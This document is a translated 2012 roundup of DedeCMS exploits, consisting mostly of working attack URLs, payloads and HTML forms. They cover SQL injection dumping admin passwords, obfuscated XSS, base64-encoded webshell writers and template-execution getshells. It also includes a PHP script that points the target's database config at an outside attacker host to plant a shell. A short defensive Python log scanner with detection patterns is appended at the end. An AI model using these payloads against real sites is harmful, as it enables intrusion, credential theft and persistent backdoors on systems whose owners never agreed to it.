
DedeCMS vulnerability roundup

Posted on 2012-10-18 10:42:14
DedeCMS 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a software item; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After it is published, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, writing a one-line webshell directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; no matter how you then visit any of the URLs below, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable-overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
// usage banner when no aid argument is given
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// the first response line is checked for "OK"
if (strpos($exp,"OK")>12){
    echo "\nExploit Success \n";
    if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n" ;
    if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n" ;
    if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // POST body
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    // raw HTTP request assembled by hand
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you are taken straight into the site backend.
Precondition: this only works once the backend path has been obtained.
Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(这里构造)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article. Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system GetShell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, which gives a 20-character MD5; then strip 3 from the front and 1 from the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL field value overflow that triggers an error, combined with DEDECMS logging database error messages via PHP into a file whose header performs no validation.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
You can see the error message.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the same output as in step 2 means the trojan file was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
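An added defensive example, not from the original post: a Python scanner that flags the request patterns behind the exploits collected above in a web server access log. The log lines, hosts and addresses are constructed; because an access log only records the query string, the POST-body variants (the mytag_js.php form and the PHP script) need request-body logging or a WAF in front of DedeCMS to be visible.

```python
"""Scan web access logs for the DedeCMS request patterns listed in this post."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (documentation IPs, no real hosts).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` HTTP/1.1" 200 512
203.0.113.7 - - [18/Oct/2012:10:43:01 +0800] "POST /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 200 88
198.51.100.4 - - [18/Oct/2012:10:44:22 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2044
198.51.100.4 - - [18/Oct/2012:10:45:00 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 310
192.0.2.10 - - [18/Oct/2012:10:46:30 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0
192.0.2.10 - - [18/Oct/2012:10:47:10 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 7720
192.0.2.11 - - [18/Oct/2012:10:48:05 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 5120
"""

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3})'
)

# One rule per technique from the post; each regex runs on the URL-decoded request target.
RULES = [
    # register_globals overwrite of $GLOBALS['cfg_*'] through _COOKIE/_POST/_GET arrays
    ("globals-overwrite", re.compile(r"\[globals\]\[cfg_", re.I)),
    # raw SQL handed to plus/advancedsearch.php in the sql parameter
    ("advancedsearch-sql", re.compile(r"/plus/advancedsearch\.php\?.*\bsql=", re.I)),
    # script injection through the login.php gotopage parameter
    ("gotopage-xss", re.compile(r"gotopage=.*<script", re.I)),
    # reads of the PHP-format MySQL error log used as a write primitive
    ("mysql-error-trace", re.compile(r"/data/mysql_error_trace\.php", re.I)),
    ("rss-cs-injection", re.compile(r"/plus/rss\.php\?.*_cs\[", re.I)),
    ("digg-frame-comment", re.compile(r"/plus/digg_frame\.php\?.*mid=\*/", re.I)),
    # traversal in oldface (edit_face.php), code (carbuyaction.php), templet (article_edit.php)
    ("traversal-file-param", re.compile(r"(oldface|code|templet)=[^&]*\.\./", re.I)),
    ("union-select-inject", re.compile(r"(feedback_js|infosearch)\.php\?.*union\s+select", re.I)),
    ("select-soft-post", re.compile(r"/include/dialog/select_soft_post\.php", re.I)),
    # template tags with runphp or {dede:php} arriving in request parameters
    ("template-runphp", re.compile(r"\{dede:[^}]*runphp=|\{dede:php\}", re.I)),
]


def decode_target(target: str) -> str:
    """URL-decode twice so single- and double-encoded payloads ('%255B' -> '[') normalize alike."""
    return unquote_plus(unquote_plus(target))


def scan_log(text: str):
    """Return (ip, rule_name, decoded_target) for each rule a log line triggers, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a production pipeline should count these too
        target = decode_target(m.group("target"))
        for name, pattern in RULES:
            if pattern.search(target):
                hits.append((m.group("ip"), name, target))
    return hits


def hits_per_ip(hits):
    """Aggregate hits by source address; one client tripping several rules warrants an alert."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, rule, target in found:
        print(f"{ip:<13} {rule:<22} {target[:60]}")
    print(hits_per_ip(found))
```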